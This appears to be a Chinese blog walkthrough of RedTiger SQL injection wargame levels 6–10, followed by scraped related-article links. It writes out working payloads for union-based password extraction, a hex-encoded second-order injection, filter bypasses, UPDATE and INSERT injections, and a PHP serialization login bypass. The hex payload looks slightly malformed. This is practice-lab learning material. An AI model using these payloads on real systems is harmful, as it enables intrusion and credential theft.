第六关:

点击 click me,构造url:user=1',返回user not found。user=1'',同样。

猜测是数字型注入,构造order by , user=1 order by  X#,得出有5个字段。

然后,user=0 union select 1,2,3,4,5#,说user not found。不是吧。。。。

用username试试吧,user=0 union select 1,username,3,4,5 from level6_users where status=1#

返回如图:

接下来就需要找密码了。用password试了5个位置,没用。想了好长时间,没有啥思路,只能看大佬的writeup了。(参考https://blog.spoock.com/2016/07/25/redtiger-writeup/)

知道了可能是sql二次查询:

1

2

3

4

5

6

7

8
 
$sql = "select username,password from level6_users where id=1";

$result=mysql_query($sql) or die('<pre>' . mysql_error() . '</pre>' );

$row1 = mysql_fetch_row($result);

#从结果中取出username字段

$username = $row1[1];

$sql2 = "select username,email from level6_users where username="."'".$username."'";

构造payload:user=0 union select 1,admin'union select 1,2,3,password,5 from level6_users where status=1#,3,4,5#    返回 user not found,  哦,fuck。

大佬说转换成16进制,脑子不够用,emmmmmm。

最终payload:user=0 union select 1,0x061646d696e3127756e696f6e2073656c65637420312c322c332c70617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123,3,4,5#

第七关:

提示如上,过滤了一堆东西,输入一个 ' 试试,报错并且返回sql语句:

思考后,先把括号闭合,然后经过测试,order by 被ban了,而且注释 #  和--  也无效。

order by 可以直接用 union select猜  ,注释 -- ,空格可以用%a0等等替换,构造

payload:')union select 1--%a0, 只能用burp抓包改值,hackbar  post提交不行,不知道为啥,搞了半天没结果。猜测出列数为4。

结果只显示,3和4.之后注入:')union select 1,2,autor,4 from level7_news--%a0

最后得到答案。

第八关:

看到4个输入框,分别输入一次单引号,发现只有email后可以注入,

然后没什么思路了,看了大佬们的操作,猜测后台的语句为:

update table set name='[inputname]',email='[inputemail]',icq='[inputicq]',age='[inputage]' where id=1

update 语句  后边的值会覆盖前边的值,比如:update table set name=1,email=2,name=2.........

此时 name最终是2。

于是我们构造:',name=password,icq='1

得到admin用户的密码。

第九关:

测试发现在text 初添加' 会报错,这里存在注入点。

猜测后台语句为:

insert into tablename(autor,title,text) values('[inputautor]','[inputtitle]','[inputtext]')。

于是构造:

'), ((select username from level9_users limit 1), (select password from level9_users limit 1),'456

得到用户名和密码。参考(https://blog.spoock.com/2016/07/25/redtiger-writeup/).

第十关:

这关和php序列化有关,比较懵。

看源代码,有一串base64加密的东西,解密得到:

a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}

提示只能用TheMaster登录,但是密码不知道,序列化,可以把密码改成布尔值为1.

于是改为:a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}

base64加密后提交过关。

Redtiger SQL注入练习(二)的更多相关文章

  1. SQL注入之二次,加解密,DNS等注入

    #sql注入之二次注入 1.注入原理 二次注入可以理解为,构造恶意数据存储在数据库后,恶意数据被读取并进入到了SQL查询语句所导致的注入.恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当 ...

  2. SQL注入原理二

    随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多. 但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候 ,没有对用户输入数据的合法性进行判断,使应用程序存 ...

  3. sql注入总结(二)--2018自我整理

    0x00前言: 继上篇的内容,这章总结下二次注入,python脚本,bypass 上篇sql注入总结(一)--2018自我整理 0x01二次注入: 二次注入的原理是在把非法代码添加进数据库里面存储了, ...

  4. 170605、防止sql注入(二)

    java filter防止sql注入攻击 原理,过滤所有请求中含有非法的字符,例如:, & <  select delete 等关键字,黑客可以利用这些字符进行注入攻击,原理是后台实现使 ...

  5. Redtiger SQL注入练习(一)

    感觉会的东西太少了,以后要多练习,多写博客.要坚持学习,一定不能放弃,为梦想奋斗. redtiger  这个平台早就开始做了,但是才做到第4关.... 第一关: 打开题, 先随便试,后来发现点击 Ca ...

  6. 十七:SQL注入之二次加解密,DNS注入

    加解密,二次,DNSlog注入 注入原理,演示案例,实际应用. less-21关,base64进行解密 encode加密decode解密 cookie处注入 判断加密算法,然后进行注入 less-24 ...

  7. SQL注入篇二------利用burp盲注,post注入,http头注入,利用burpsuit找注入点,宽字节注入

    1.布尔盲注burpsuit的使用 先自己构造好注入语句,利用burpsuit抓包,设置变量,查出想要的信息. 比如----查数据库名的ascii码得到数据库构造好语句 http://123.206. ...

  8. C#防SQL注入代码的实现方法

    对于网站的安全性,是每个网站开发者和运营者最关心的问题.网站一旦出现漏洞,那势必将造成很大的损失.为了提高网站的安全性,首先网站要防注入,最重要的是服务器的安全设施要做到位. 下面说下网站防注入的几点 ...

  9. sql注入的防护

    一.严格的数据类型 在Java,C#等高级语言中,几乎不存在数字类型注入,而对于PHP,ASP等弱类型语言,就存在了危险. 防御数字型注入相对简单,如果不需要输入字符型数据,则可以用is_numeri ...

随机推荐

  1. Asp.net Core 使用Jenkins + Dockor 实现持续集成、自动化部署(二):部署

    前面又是废话 我之前写过: Asp.Net Core 程序部署到Linux(centos)生产环境(一):普通部署 Asp.Net Core 程序部署到Linux(centos)生产环境(二):doc ...

  2. 【ASP.NET Core快速入门】(二)部署到IIS

    配置IIS模块 ASP.NET Core Module载地址:https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/asp ...

  3. 你真的会PHP吗?

    Note: 1) PHP中的数据类型 PHP一共支持八种数据类型, 4种标量类型,boolean(布尔型),integer(整形),float/double(浮点型)和string(字符串类型), 2 ...

  4. centos系统安装第三方源EPEL

    epel没安装呗 相当于扩展型软件仓库,EPEL (Extra Packages for Enterprise Linux,企业版Linux的额外软件包) 是Fedora小组维护的一个软件仓库项目,为 ...

  5. 阿里云HBase全新发布X-Pack 赋能轻量级大数据平台

    一.八年双十一,造就国内最大最专业HBase技术团队 阿里巴巴集团早在2010开始研究并把HBase投入生产环境使用,从最初的淘宝历史交易记录,到蚂蚁安全风控数据存储.持续8年的投入,历经8年双十一锻 ...

  6. REST API设计指导——译自Microsoft REST API Guidelines(四)

    前言 前面我们说了,如果API的设计更规范更合理,在很大程度上能够提高联调的效率,降低沟通成本.那么什么是好的API设计?这里我们不得不提到REST API. 关于REST API的书籍很多,但是完整 ...

  7. 详解什么是平衡二叉树(AVL)(修订补充版)

    详解什么是平衡二叉树(AVL)(修订补充版) 前言 Wiki:在计算机科学中,AVL树是最早被发明的自平衡二叉查找树.在AVL树中,任一节点对应的两棵子树的最大高度差为1,因此它也被称为高度平衡树.查 ...

  8. MEF 基础简介 四

    前言 前面讲解了MEF的引用方法,接口的导入导出,类属性的导入导出和集合的导出用法其实大家可以看到基本上大同小异的. MEF的延迟加载 我们知道当装配一个组件的时候,当前组件里面的所有的Import的 ...

  9. 改善 C# 的语言习惯(一) - 使用属性而不是可访问的数据成员(整理中)

    改善 C# 的语言习惯(一) - 使用属性而不是可访问的数据成员 序 为什么我们的程序运行得棒棒的,还要改呢?Why? 答:我们要让程序运行得更快,执行的效率更高,代码的可读性更强,维护的成本更低.. ...

  10. 基于MVC的网站和在线教育系统

    最近老表说要创业,想要做一个网站做宣传,还想要一个在线教育系统. 学习了一部分 Java,  决定用.Net MVC做官网或直接做成静态HTML网站,主要是因为.Net MVC 技术简单,效率高,需求 ...